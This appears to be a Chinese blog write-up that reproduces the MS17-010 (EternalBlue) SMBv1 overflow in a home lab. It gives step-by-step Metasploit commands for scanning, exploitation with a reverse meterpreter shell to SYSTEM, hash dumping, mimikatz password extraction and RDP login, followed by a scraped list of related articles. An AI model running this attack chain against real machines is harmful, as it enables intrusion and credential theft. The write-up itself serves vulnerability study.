一、漏洞原理
MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
二、影响版本
Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
三、漏洞利用
在现在来说永恒之蓝漏洞算是有点老的漏洞了,Metasploit上已经有集成payload了,但是其危害确实是很大的,因为只要用它打进去似乎直接就是system权限,所以还是拿出来复现了一下。这里我搭的环境是win7,之前用过winxp做环境,结果也是一样的(直接system)。本来这次是打算用win8作为实验环境的,但是在最后用payload去exploit的时候一直回显超时(但是攻击机是ping得通win8机子的,并且扫描模块也显示搭的win8有cve-2017-0143漏洞),所以就换成了win7。不管是用哪种操作系统做环境,前提都要是没打cve-2017-0143漏洞的补丁的,不然怎么样都是白搞。
1.环境
攻击机:kali(192.168.123.31)
目标机:win7(192.168.123.79)
2.漏洞利用
端口扫描查看目标机开455端口没,没开就不用考虑下一步了nmap -sS 192.168.123.79


然后就是直接启用msf,去查cve-2017-0143的集成模块search cve-2017-0143

然后先用扫描模块扫描一下目标机的永恒之蓝漏洞能不能用
use auxiliary/scanner/smb/smb_ms17_010该设置什么参数就都设置上

是能看到目标机上的永恒之蓝漏洞是可以利用的,接下来就是使用攻击模块了

 use  exploit/windows/smb/ms17_010_eternalblue

同时选择载荷(shellcode),我用的是回连至客户端(shell)的payload

set payload  windows/x64/meterpreter/reverse_tcp

然后就是该配置啥参数就配置啥参数

这里我用的本地监听端口是8888,默认是4444,然后直接run就行了

这里能看到进来直接就是system权限。
3.如果目标机还开了3389端口的话,还可以尝试去获取用户登录密码。
先用hashdump获取hash值。
mimikatz是一个知名的密码提取神器。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证等,meterpreter中正集成了这款工具。
执行load mimikatz即可加载该工具,然后运行命令msv,导出hash

然后执行kerberos就能拿到用户登录密码了

拿到用户登录的账户密码就可以尝试远程连接了,如果连接请求被拦截了,可以尝试将端口转发到攻击机的本地端口进行连接

rdesktop  127.0.0.1 -u 用户名  -p 密码

然后就能弹回目标机的桌面了。

CVE-2017-0143(远程溢出)漏洞复现相关推荐

  1. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记

    0x01  环境搭建 win2003 攻击机,ip:192.168.0.28 kali 攻击机,ip:192.168.0.27 win7 靶机,ip:192.168.0.14:netstat -an ...

  2. MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现

    MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现 文章目录 MS08-067远程代码执行漏洞(CVE-2008-4250 ...

  3. 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)

    文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...

  4. 利用MS08067远程溢出漏洞抓肉鸡

    利用MS08067远程溢出漏洞抓肉鸡 陈小兵 [antian365.com] 微软的正版验证机会出来以后没有多久,就爆出针对台湾和简体中文版本的MS08067漏洞,这个时候微软主动爆出这个号称比冲击波 ...

  5. 一步到位的 UPnP 远程溢出漏洞实战

    远程溢出***漏洞 (Remote Buffer Overflow Vulnerability) 是远程直接***被黑 电脑或服务器最典型.最常见的漏洞,原因无它,只要溢出成功并运行 ShellCod ...

  6. linux远程溢出,Linux netkit in.telnetd远程溢出漏洞

    Linux netkit in.telnetd远程溢出漏洞 2008-04-09 04:30:32来源:互联网 阅读 () Linux netkit in.telnetd远程溢出漏洞 发布日期:200 ...

  7. CVE-2021-3156 Sudo溢出漏洞复现

    CVE-2021-3156漏洞介绍 Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo. 2021年01月26日,sudo被披露存 ...

  8. webmin 远程代码漏洞复现

    漏洞简介 webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关 ...

  9. c++ c6386 缓冲区 溢出_Office 远程溢出漏洞测试与分析

    本文作者:ghostkeeper(信安之路首次投稿作者) 获得奖励:加入信安之路核心群+免费邀请加入信安之路知识星球+免费获取 90sec 论坛邀请码 在 2017 年 11 月,微软发布的 11 月 ...

  10. CVE-2018-4407 苹果设备远程溢出漏洞

    2018-10-30 公开了一个 Apple 设备的远程代码执行漏洞 CVE-2018-4407,该漏洞是收到畸形数据包后,向发送方报告错误,在构造 ICMP 数据包时发生了溢出,影响 macOS 1 ...

最新文章

  1. tf.nn.softmax_cross_entropy_with_logits中的“logits”到底是个什么意思?
  2. 流氓软件彻底免疫程序 v2.2 绿色版
  3. 使用django的用户帐号登录openfire
  4. 如果禁用了cookie 怎么传session
  5. linux mysql怎么启动_linux下安装完mysql 怎么启动
  6. get/post 接口调用
  7. 生成有时间限制的二维码_微信公众号渠道二维码怎么制作?监测渠道效果的利器来了...
  8. 今天见 | 洞见数据库前沿趋势 DTCC 2020阿里云9大看点早知道
  9. PHP提高redis命中率,怎么提高redis缓存命中率
  10. LeetCode-50-Pow(x, n)
  11. 【select模块】select IO多路复用和select实现FTP
  12. linux统计代码注释率,统计代码注释率
  13. python列表有固定大小吗_如何在python中创建固定大小的列表?
  14. [UE4]虚幻引擎UE4如何制作可拖动(Drag and Drop)的背包(Scrollbox)(转载)
  15. php求add函数,PHP函数每日一贴之字符串函数-addcslashes()函数
  16. python读取行政区txt文件实现行政区树_数据库的点数据根据行政区shp来进行行政区处理,python定时器实现...
  17. tensorflow - model.predict
  18. 赶个项目,博客稍后更新
  19. VS2015 vs2017 密钥
  20. 发布量子加密手机,浓眉大眼的三星也开始技术碰瓷了?

热门文章

  1. mysql数据狛聘_.net 生成拼音码与五笔码实例代码
  2. 《需求工程:软件建模与分析》笔记(一)
  3. linux 程序的权限设置,Linux权限设置详解
  4. 虚拟机Ubuntu设置屏幕分辨率
  5. 【教程】Spire.PDF教程:C# 添加、获取和删除 PDF 自定义文档属性
  6. mysql数据库各项参数查询
  7. 集中不等式 (Concentration inequality)
  8. mui中双webView的刷新
  9. Nacos中Distro协议梳理
  10. 手机短信压力测试v1.4